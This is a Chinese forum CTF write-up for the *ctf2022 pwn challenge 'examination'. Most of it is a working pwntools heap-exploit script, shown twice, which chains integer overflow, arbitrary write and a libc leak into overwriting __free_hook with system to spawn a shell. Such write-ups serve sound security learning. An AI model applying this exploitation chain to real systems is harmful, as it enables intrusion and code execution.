-
-
[原创]【*ctf2022】examination
-
发表于: 2022-4-28 19:00 8652
-
何谓成长?成长就是当你还未成熟的时候脑海中复现的担当。学pwn已经半年多了,总不能还称自己是新手了吧
从之前栈题都不大会,遇到堆题基本放弃,从见了musl、go、arm就躲到现在终于主动去学习相关的知识,这就是成长。成长不仅仅意味着能力的提升,还意味着心灵的成熟,对学习的态度的变化。
最后,引用最近的脑海中一直复现的鼬神的一句话:
“你并不弱,只是缺乏信念”
通过整型溢出,在note段向上伪造结构体实现任意地址写,修改一个chunk的size,free它放入unsortedbin leak libc,再通过任意地址写修改free_hook为system,然后free('/bin/sh')实现shell的get
有些绕过的细节其实调调就能出
这题让我认识到了自己shit一样的逆向
逆不动的时候,可以放gdb里调调,拿张草稿纸画画或者在旁边注一下自己好理解的形式比如:
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc
=
ELF(
'./libc-2.31.so'
)
r
=
process(
'./examination'
)
def
z():
gdb.attach(r)
def
cho(num):
r.sendafter(
"choice>> "
,
str
(num))
def
t_add(num):
cho(
1
)
r.sendlineafter(
'enter the number of questions: '
,
str
(num))
def
t_view(idx,cont,size):
##first_view
cho(
3
)
r.sendlineafter(
"which one? > "
,
str
(idx))
bool_
=
r.recvuntil(
'comment:'
)
if
bool_
=
=
"enter your comment:"
:
r.send(cont)
else
:
r.sendline(
str
(size))
r.sendafter(
"enter your comment:"
,cont)
def
t_delet(idx):
cho(
4
)
r.sendafter(
"which student id to choose?"
,
str
(idx))
def
t_role(num):
cho(
5
)
r.sendlineafter(
"role: <0.teacher/1.student>: "
,
str
(num))
def
s_changeid(idx):
cho(
6
)
r.sendlineafter(
"input your id: "
,
str
(idx))
##pre
r.sendlineafter(
"role: <0.teacher/1.student>: "
,
str
(
0
))
t_add(
1
)
#0
t_add(
1
)
#1
t_view(
0
,
hex
(
0xdeadbeef
),
0x300
)
t_view(
1
,
hex
(
0xdeadbeef
),
0x300
)
t_role(
1
)
cho(
3
)
t_role(
0
)
cho(
2
)
##leak_heap
t_role(
1
)
cho(
2
)
r.recvuntil(
"Good Job! Here is your reward! "
)
heap
=
int
(r.recvuntil(
'\n'
,drop
=
True
),base
=
16
)
-
0x2a0
log.success(
'heap:'
+
hex
(heap))
r.sendlineafter(
"add 1 to wherever you want! addr: "
,
'00'
+
str
(heap
+
0x200
))
##make_fake_struct
s_changeid(
-
15
)
cho(
4
)
pd
=
p64(heap
+
0x968
)
+
p64(
0xdeadbeef
)
+
p64(heap
+
0x338
)
r.sendlineafter(
"enter your mode!"
,pd)
##change chunck(0x55555555f330) size 311 to 621
t_role(
0
)
t_view(
-
13
,p64(
0x621
),
0x300
)
##free_2_trew_in_unsortedbin
t_delet(
0
)
##change struct 2 leak libc
t_role(
1
)
s_changeid(
-
15
)
cho(
4
)
pd
=
p64(heap
+
0x968
)
+
p64(
0xdeadbeef
)
+
p64(heap
+
0x340
)
r.sendlineafter(
"enter your mode!"
,pd)
s_changeid(
-
13
)
cho(
2
)
r.recvuntil(
"here is the review:\n"
)
libcbase
=
u64(r.recvuntil(
'\x7f'
).ljust(
8
,
'\x00'
))
-
0x1ecbe0
log.success(
'libcbase:'
+
hex
(libcbase))
##set_libc_fuc
free_hook
=
libcbase
+
libc.sym[
'__free_hook'
]
system
=
libcbase
+
libc.sym[
'system'
]
log.success(
'free_hook:'
+
hex
(free_hook))
log.success(
'system:'
+
hex
(system))
##change_free_hook
s_changeid(
-
15
)
cho(
4
)
pd
=
p64(heap
+
0x968
)
+
p64(
0xdeadbeef
)
+
p64(free_hook)
r.sendlineafter(
"enter your mode!"
,pd)
t_role(
0
)
t_view(
-
13
,p64(system),
0x300
)
##get_shell
t_add(
1
)
t_view(
1
,
'/bin/sh\x00'
,
0x300
)
t_delet(
1
)
r.interactive()
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
context.log_level
=
'debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch
=
'amd64'
context.os
=
'linux'
def
proof_of_work(sh):
sh.recvuntil(
" == "
)
cipher
=
sh.recvline().strip().decode(
"utf8"
)
proof
=
mbruteforce(
lambda
x: sha256((x).encode()).hexdigest()
=
=
cipher, string.ascii_letters
+
string.digits, length
=
4
, method
=
'fixed'
)
sh.sendlineafter(
"input your ????>"
, proof)
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc
=
ELF(
'./libc-2.31.so'
)
r
=
process(
'./examination'
)
def
z():
gdb.attach(r)
def
cho(num):
r.sendafter(
"choice>> "
,
str
(num))
def
t_add(num):
cho(
1
)
r.sendlineafter(
'enter the number of questions: '
,
str
(num))
def
t_view(idx,cont,size):
##first_view
cho(
3
)
r.sendlineafter(
"which one? > "
,
str
(idx))
bool_
=
r.recvuntil(
'comment:'
)
if
bool_
=
=
"enter your comment:"
:
r.send(cont)
else
:
r.sendline(
str
(size))
r.sendafter(
"enter your comment:"
,cont)
def
t_delet(idx):
cho(
4
)
r.sendafter(
"which student id to choose?"
,
str
(idx))
def
t_role(num):
cho(
5
)
r.sendlineafter(
"role: <0.teacher/1.student>: "
,
str
(num))
[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!
赞赏
他的文章
- 西湖论剑2024 IOT赛后复盘及mqtt rce详解 14713
- 对某嵌入式设备声波配网的研究 12069
- DAS10月月赛PWN出题心路&&CVE-2023-40930的介绍 11476
- [原创]关于Nokelock蓝牙锁破解分析 22125
- [原创]基于树莓派的蓝牙调试环境搭建 24613
看原图
赞赏
雪币:
留言: